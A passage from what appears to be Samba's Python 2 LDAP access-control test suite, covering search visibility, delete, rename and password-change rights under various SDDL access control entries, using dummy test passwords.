res_list = [ x["dn"] for x in res if x["dn"] in self.full_list ]
self.assertEquals(sorted(res_list), sorted(self.full_list))
res = self.ldb_user2.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 6)
res_list = [ x["dn"] for x in res if x["dn"] in self.full_list ]
self.assertEquals(sorted(res_list), sorted(self.full_list))
def test_search2(self):
"""Make sure users can't see us if access is explicitly denied"""
self.create_clean_ou("OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou4,OU=ou2,OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)
mod = "(D;;LC;;;%s)(D;;LC;;;%s)" % (str(self.user_sid), str(self.group_sid))
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user3.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
#this user should see all ous
res_list = [ x["dn"] for x in res if x["dn"] in self.full_list ]
self.assertEquals(sorted(res_list), sorted(self.full_list))
#these users should see ou1, 2, 5 and 6 but not 3 and 4
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)]
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
res = self.ldb_user2.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 4)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
def test_search3(self):
"""Make sure users can't see ous if access is explicitly denied - 2"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;CI;LC;;;%s)(A;CI;LC;;;%s)" % (str(self.user_sid), str(self.group_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
print "Testing correct behavior on nonaccessible search base"
try:
self.ldb_user3.search("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_BASE)
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
else:
self.fail()
mod = "(D;;LC;;;%s)(D;;LC;;;%s)" % (str(self.user_sid), str(self.group_sid))
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn)]
res = self.ldb_user3.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)]
#should not see ou3 and ou4, but should see ou5 and ou6
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 4)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
res = self.ldb_user2.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 4)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
def test_search4(self):
"""There is no difference in visibility if the user is also creator"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;CI;CC;;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
self.ldb_user.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn)]
res = self.ldb_user3.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 2)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 2)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
def test_search5(self):
"""Make sure users can see only attributes they are allowed to see"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;CI;LC;;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
# assert user can only see dn
res = self.ldb_user.search("OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
ok_list = ['dn']
self.assertEquals(len(res), 1)
res_list = res[0].keys()
self.assertEquals(res_list, ok_list)
res = self.ldb_user.search("OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_BASE, attrs=["ou"])
self.assertEquals(len(res), 1)
res_list = res[0].keys()
self.assertEquals(res_list, ok_list)
#give read property on ou and assert user can only see dn and ou
mod = "(OA;;RP;bf9679f0-0de6-11d0-a285-00aa003049e2;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user.search("OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
ok_list = ['dn', 'ou']
self.assertEquals(len(res), 1)
res_list = res[0].keys()
self.assertEquals(sorted(res_list), sorted(ok_list))
#give read property on Public Information and assert user can see ou and other members
mod = "(OA;;RP;e48d0154-bcf8-11d1-8702-00c04fb96050;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user.search("OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
ok_list = ['dn', 'objectClass', 'ou', 'distinguishedName', 'name', 'objectGUID', 'objectCategory']
res_list = res[0].keys()
self.assertEquals(sorted(res_list), sorted(ok_list))
def test_search6(self):
"""If an attribute that cannot be read is used in a filter, it is as if the attribute does not exist"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;CI;LCCC;;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(ou=ou3)",
scope=SCOPE_SUBTREE)
#nothing should be returned as ou is not accessible
self.assertEquals(len(res), 0)
#give read property on ou and assert user can only see dn and ou
mod = "(OA;;RP;bf9679f0-0de6-11d0-a285-00aa003049e2;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(ou=ou3)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 1)
ok_list = ['dn', 'ou']
res_list = res[0].keys()
self.assertEquals(sorted(res_list), sorted(ok_list))
#give read property on Public Information and assert user can see ou and other members
mod = "(OA;;RP;e48d0154-bcf8-11d1-8702-00c04fb96050;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(ou=ou2)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 1)
ok_list = ['dn', 'objectClass', 'ou', 'distinguishedName', 'name', 'objectGUID', 'objectCategory']
res_list = res[0].keys()
self.assertEquals(sorted(res_list), sorted(ok_list))
#tests on ldap delete operations
class AclDeleteTests(AclTests):
def setUp(self):
super(AclDeleteTests, self).setUp()
self.regular_user = "acl_delete_user1"
# Create regular user
self.ldb_admin.newuser(self.regular_user, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.regular_user, self.user_pass)
def tearDown(self):
super(AclDeleteTests, self).tearDown()
delete_force(self.ldb_admin, self.get_user_dn("test_delete_user1"))
delete_force(self.ldb_admin, self.get_user_dn(self.regular_user))
delete_force(self.ldb_admin, self.get_user_dn("test_anonymous"))
def test_delete_u1(self):
"""User is prohibited by default to delete another User object"""
# Create user that we try to delete
self.ldb_admin.newuser("test_delete_user1", self.user_pass)
# Deleting the User object here should ALWAYS throw an exception
try:
self.ldb_user.delete(self.get_user_dn("test_delete_user1"))
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_delete_u2(self):
"""User's group has RIGHT_DELETE to another User object"""
user_dn = self.get_user_dn("test_delete_user1")
# Create user that we try to delete
self.ldb_admin.newuser("test_delete_user1", self.user_pass)
mod = "(A;;SD;;;AU)"
self.sd_utils.dacl_add_ace(user_dn, mod)
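# "SD" in this ACE is the standard DELETE access right (not a security
# descriptor) and "AU" abbreviates Authenticated Users, so any authenticated
# user -- including the regular test user -- may delete the object.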
# Try to delete User object
self.ldb_user.delete(user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
def test_delete_u3(self):
"""User indentified by SID has RIGHT_DELETE to another User object"""
user_dn = self.get_user_dn("test_delete_user1")
# Create user that we try to delete
self.ldb_admin.newuser("test_delete_user1", self.user_pass)
mod = "(A;;SD;;;%s)" % self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
self.sd_utils.dacl_add_ace(user_dn, mod)
# Try to delete User object
self.ldb_user.delete(user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
def test_delete_anonymous(self):
"""Test add operation with anonymous user"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
self.ldb_admin.newuser("test_anonymous", "samba123@")
try:
anonymous.delete(self.get_user_dn("test_anonymous"))
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
#tests on ldap rename operations
class AclRenameTests(AclTests):
def setUp(self):
super(AclRenameTests, self).setUp()
self.regular_user = "acl_rename_user1"
self.ou1 = "OU=test_rename_ou1"
self.ou2 = "OU=test_rename_ou2"
self.ou3 = "OU=test_rename_ou3,%s" % self.ou2
self.testuser1 = "test_rename_user1"
self.testuser2 = "test_rename_user2"
self.testuser3 = "test_rename_user3"
self.testuser4 = "test_rename_user4"
self.testuser5 = "test_rename_user5"
# Create regular user
self.ldb_admin.newuser(self.regular_user, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.regular_user, self.user_pass)
def tearDown(self):
super(AclRenameTests, self).tearDown()
# Clean up the rename-test OU3 tree
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser1, self.ou3, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser2, self.ou3, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser5, self.ou3, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou3, self.base_dn))
# Clean up the rename-test OU2 tree
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser1, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser2, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser5, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou2, self.base_dn))
# Clean up the rename-test OU1 tree
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser1, self.ou1, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser2, self.ou1, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" % (self.testuser5, self.ou1, self.base_dn))
delete_force(self.ldb_admin, "OU=test_rename_ou3,%s,%s" % (self.ou1, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou1, self.base_dn))
delete_force(self.ldb_admin, self.get_user_dn(self.regular_user))
def test_rename_u1(self):
"""Regular user fails to rename 'User object' within single OU"""
# Create OU structure
self.ldb_admin.create_ou("OU=test_rename_ou1," + self.base_dn)
self.ldb_admin.newuser(self.testuser1, self.user_pass, userou=self.ou1)
try:
self.ldb_user.rename("CN=%s,%s,%s" % (self.testuser1, self.ou1, self.base_dn), \
"CN=%s,%s,%s" % (self.testuser5, self.ou1, self.base_dn))
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_rename_u2(self):
"""Grant WRITE_PROPERTY to AU so regular user can rename 'User object' within single OU"""
ou_dn = "OU=test_rename_ou1," + self.base_dn
user_dn = "CN=test_rename_user1," + ou_dn
rename_user_dn = "CN=test_rename_user5," + ou_dn
# Create OU structure
self.ldb_admin.create_ou(ou_dn)
self.ldb_admin.newuser(self.testuser1, self.user_pass, userou=self.ou1)
mod = "(A;;WP;;;AU)"
self.sd_utils.dacl_add_ace(user_dn, mod)
# Rename 'User object' having WP to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u3(self):
"""Test rename with rights granted to 'User object' SID"""
ou_dn = "OU=test_rename_ou1," + self.base_dn
user_dn = "CN=test_rename_user1," + ou_dn
rename_user_dn = "CN=test_rename_user5," + ou_dn
# Create OU structure
self.ldb_admin.create_ou(ou_dn)
self.ldb_admin.newuser(self.testuser1, self.user_pass, userou=self.ou1)
sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(A;;WP;;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(user_dn, mod)
# Rename 'User object' having WP granted to the user's SID
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u4(self):
"""Rename 'User object' cross OU with WP, SD and CC right granted on reg. user to AU"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + self.base_dn
user_dn = "CN=test_rename_user2," + ou1_dn
rename_user_dn = "CN=test_rename_user5," + ou2_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
self.ldb_admin.newuser(self.testuser2, self.user_pass, userou=self.ou1)
mod = "(A;;WPSD;;;AU)"
self.sd_utils.dacl_add_ace(user_dn, mod)
mod = "(A;;CC;;;AU)"
self.sd_utils.dacl_add_ace(ou2_dn, mod)
# Rename 'User object' having WP/SD and CC granted to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u5(self):
"""Test rename with rights granted to 'User object' SID"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + self.base_dn
user_dn = "CN=test_rename_user2," + ou1_dn
rename_user_dn = "CN=test_rename_user5," + ou2_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
self.ldb_admin.newuser(self.testuser2, self.user_pass, userou=self.ou1)
sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(A;;WPSD;;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(user_dn, mod)
mod = "(A;;CC;;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(ou2_dn, mod)
# Rename 'User object' having WP/SD and CC granted to the user's SID
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u6(self):
"""Rename 'User object' cross OU with WP, DC and CC right granted on OU & user to AU"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + self.base_dn
user_dn = "CN=test_rename_user2," + ou1_dn
rename_user_dn = "CN=test_rename_user2," + ou2_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
#mod = "(A;CI;DCWP;;;AU)"
mod = "(A;;DC;;;AU)"
self.sd_utils.dacl_add_ace(ou1_dn, mod)
mod = "(A;;CC;;;AU)"
self.sd_utils.dacl_add_ace(ou2_dn, mod)
self.ldb_admin.newuser(self.testuser2, self.user_pass, userou=self.ou1)
mod = "(A;;WP;;;AU)"
self.sd_utils.dacl_add_ace(user_dn, mod)
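# Rights assembled above (as this test's setup suggests): a cross-OU move
# needs DELETE_CHILD ("DC") on the source OU, CREATE_CHILD ("CC") on the
# destination OU, and WRITE_PROPERTY ("WP") on the object for its RDN.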
# Rename 'User object' having DC, CC and WP granted to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u7(self):
"""Rename 'User object' cross OU (second level) with WP, DC and CC right granted on OU to AU"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + self.base_dn
ou3_dn = "OU=test_rename_ou3," + ou2_dn
user_dn = "CN=test_rename_user2," + ou1_dn
rename_user_dn = "CN=test_rename_user5," + ou3_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
self.ldb_admin.create_ou(ou3_dn)
mod = "(A;CI;WPDC;;;AU)"
self.sd_utils.dacl_add_ace(ou1_dn, mod)
mod = "(A;;CC;;;AU)"
self.sd_utils.dacl_add_ace(ou3_dn, mod)
self.ldb_admin.newuser(self.testuser2, self.user_pass, userou=self.ou1)
# Rename 'User object' having WP/DC and CC granted to AU
self.ldb_user.rename(user_dn, rename_user_dn)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % user_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % rename_user_dn)
self.assertNotEqual(len(res), 0)
def test_rename_u8(self):
"""Test rename on an object with and without modify access on the RDN attribute"""
ou1_dn = "OU=test_rename_ou1," + self.base_dn
ou2_dn = "OU=test_rename_ou2," + ou1_dn
ou3_dn = "OU=test_rename_ou3," + ou1_dn
# Create OU structure
self.ldb_admin.create_ou(ou1_dn)
self.ldb_admin.create_ou(ou2_dn)
sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(OA;;WP;bf967a0e-0de6-11d0-a285-00aa003049e2;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(ou2_dn, mod)
mod = "(OD;;WP;bf9679f0-0de6-11d0-a285-00aa003049e2;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(ou2_dn, mod)
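# The allow ACE covers what is assumed to be the 'name' attribute
# (bf967a0e-...) while the "OD" ACE explicitly denies WP on the 'ou' RDN
# attribute (bf9679f0-...); since a rename rewrites the RDN attribute, the
# rename below must fail until an allow ACE for 'ou' is added.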
try:
self.ldb_user.rename(ou2_dn, ou3_dn)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This rename operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(A;;WP;bf9679f0-0de6-11d0-a285-00aa003049e2;;%s)" % str(sid)
self.sd_utils.dacl_add_ace(ou2_dn, mod)
self.ldb_user.rename(ou2_dn, ou3_dn)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % ou2_dn)
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % ou3_dn)
self.assertNotEqual(len(res), 0)
#tests on Control Access Rights
class AclCARTests(AclTests):
def setUp(self):
super(AclCARTests, self).setUp()
self.user_with_wp = "acl_car_user1"
self.user_with_pc = "acl_car_user2"
self.ldb_admin.newuser(self.user_with_wp, self.user_pass)
self.ldb_admin.newuser(self.user_with_pc, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.user_with_wp, self.user_pass)
self.ldb_user2 = self.get_ldb_connection(self.user_with_pc, self.user_pass)
def tearDown(self):
super(AclCARTests, self).tearDown()
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_wp))
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_pc))
def test_change_password1(self):
"""Try a password change operation without any CARs given"""
#users have change password by default - remove for negative testing
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)", "")
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)", "")
self.sd_utils.modify_sd_on_dn(self.get_user_dn(self.user_with_wp), sddl)
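# ab721a53-1e2f-11d0-9819-00aa0040529b is the User-Change-Password control
# access right; the replace() calls above strip its default grants to
# Everyone ("WD") and Principal Self ("PS"), so the password change below
# is expected to fail.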
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS2\"".encode('utf-16-le')) + """
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
else:
# for some reason we get constraint violation instead of insufficient access error
self.fail()
def test_change_password2(self):
"""Make sure WP has no influence"""
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)", "")
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)", "")
self.sd_utils.modify_sd_on_dn(self.get_user_dn(self.user_with_wp), sddl)
mod = "(A;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS2\"".encode('utf-16-le')) + """
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
else:
# for some reason we get constraint violation instead of insufficient access error
self.fail()
def test_change_password3(self):
"""Make sure WP has no influence"""
mod = "(D;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS2\"".encode('utf-16-le')) + """
""")
def test_change_password5(self):
"""Make sure rights have no influence on dBCSPwd"""
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)", "")
sddl = sddl.replace("(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)", "")
self.sd_utils.modify_sd_on_dn(self.get_user_dn(self.user_with_wp), sddl)
mod = "(D;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: dBCSPwd
dBCSPwd: XXXXXXXXXXXXXXXX
add: dBCSPwd
dBCSPwd: YYYYYYYYYYYYYYYY
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
else:
self.fail()
def test_change_password6(self):
"""Test uneven delete/adds"""
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: userPassword
userPassword: thatsAcomplPASS1
delete: userPassword
userPassword: thatsAcomplPASS1
add: userPassword
userPassword: thatsAcomplPASS2
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
mod = "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
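# 00299570-246d-11d0-a768-00aa006e0529 is the User-Force-Change-Password
# ("Reset Password") control access right, granted here to Principal Self
# ("PS"); unlike Change-Password it does not require the old password.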
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: userPassword
userPassword: thatsAcomplPASS1
delete: userPassword
userPassword: thatsAcomplPASS1
add: userPassword
userPassword: thatsAcomplPASS2
""")
# This fails on Windows 2000 domain level with constraint violation
except LdbError, (num, _):
self.assertTrue(num == ERR_CONSTRAINT_VIOLATION or
num == ERR_UNWILLING_TO_PERFORM)
else:
self.fail()
def test_change_password7(self):
"""Try a password change operation without any CARs given"""
#users have change password by default - remove for negative testing
desc = self.sd_utils.read_sd_on_dn(self.get_user_dn(self.user_with_wp))
sddl = desc.as_sddl(self.domain_sid)
self.sd_utils.modify_sd_on_dn(self.get_user_dn(self.user_with_wp), sddl)
#first change our own password
self.ldb_user2.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_pc) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
